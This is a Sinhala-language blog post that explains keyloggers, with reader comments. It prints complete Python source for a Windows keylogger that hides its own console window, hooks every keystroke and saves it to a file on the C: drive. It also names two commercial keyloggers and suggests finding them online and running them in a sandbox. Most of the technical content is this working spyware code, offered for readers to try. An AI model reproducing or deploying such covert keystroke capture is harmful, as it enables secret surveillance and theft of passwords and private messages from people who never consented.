ඕපාදුප සෙවිම - keylogger එකක ක්‍රියාකරිත්වය

4

Share/Bookmark අද මම කියන්න යන්නේ Keylogger එකක් කියන්නේ මොකක්ද හා එහි සරළ සැකසුමයි ? (මේකට පළමු විඩියෝව බලන්න) , ඊළඟට මගේ වීඩියෝ එක : Keylogger එකක ක්‍රියාකරිත්වය .gile

තමන්ට මෙම විඩියෝ වල අන්තර්ගතයන් අත්හදා බැලිමට අවශ්‍ය මෘදුකාංග සහ තොරතුරු පහතින් ලබාගන්න .garupale


Video 1
Keylogger Source code (pyton)
- Download Python: http://www.python.org/
- Download Pyhook: pyhook.sourceforge.net
- Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/
Source :import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)

if event.Ascii != 0 or 8:
f=open('c:\\output.txt','r')
buffer=f.read()
f.close()
f=open('c:\\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer += keylogs
f.write(buffer)
f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()


Video 2ආ තව දෙයක් මේ සමහර (*මම පාවිච්චි කරපු) keyloggers virus guard වලින් virus කියලා අල්ලනවා . ඒක නිසා මම පාවිච්චි කරපු keyloggers වල link මම දෙන්න යන්නේ නෑ (මොනාහරි වැරදුනොත් එහෙම මගේ ඔලුව කන්න එයි !! tension) , ඔයාලට ඕනෙම නම් Deep freeze දාලා හරි , වෙනම Virtual PC එකක් හරි දාලා keyloggers ටික ජංජාලයෙන් හොයාගෙන දාගන්න පුලුවන් .

* මම පාවිච්චි කරපු keyloggers 2 ක තමා General Keylogger v 1.0 සහ Vicspy Keylogger 2008 .

*මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale

4 comments:

  1. කලුවර අඩවිය said...
  2. එල එල මචන් නියමයි...

  3. හිඟන්නා said...
  4. @ කලුවර අඩවිය : ප්‍රතිචාරයට බොහෝම ස්තුතියි !! :D

  5. poppy said...
  6. හ්ම්....හොඳයි.මට වැටහෙන්නෙ නෑ නෙ ඒත් මේවා....hehe.මගේ තාක්ෂණික,programming,& networking...etc. දැනීම 0%!anyway I started following you.saw your comment at Ansh's blog.lol.ජයමංගල ගාථා ගැන එක.බැරිද තව ඒ විදිහෙ funny post ටිකකුත් දාන්න?අර 'මැසිමට වෙච්ච හදිය'කවියත් නියමයි!

  7. හිඟන්නා said...
  8. @ poppy අක්කා : තව නම් රසකතා තියනවා කියන්න , මතක් වෙන වෙලාවට හිමිට ඔක්කොම ලියලා දාන්න ඕනේ , අක්කගේ ප්‍රතිචාරයට බොහෝම ස්තුතියි !! , මමත් ඔයාව ඕං follow කළා ~
    :D

Post a Comment

write your comments here!

Related Posts with Thumbnails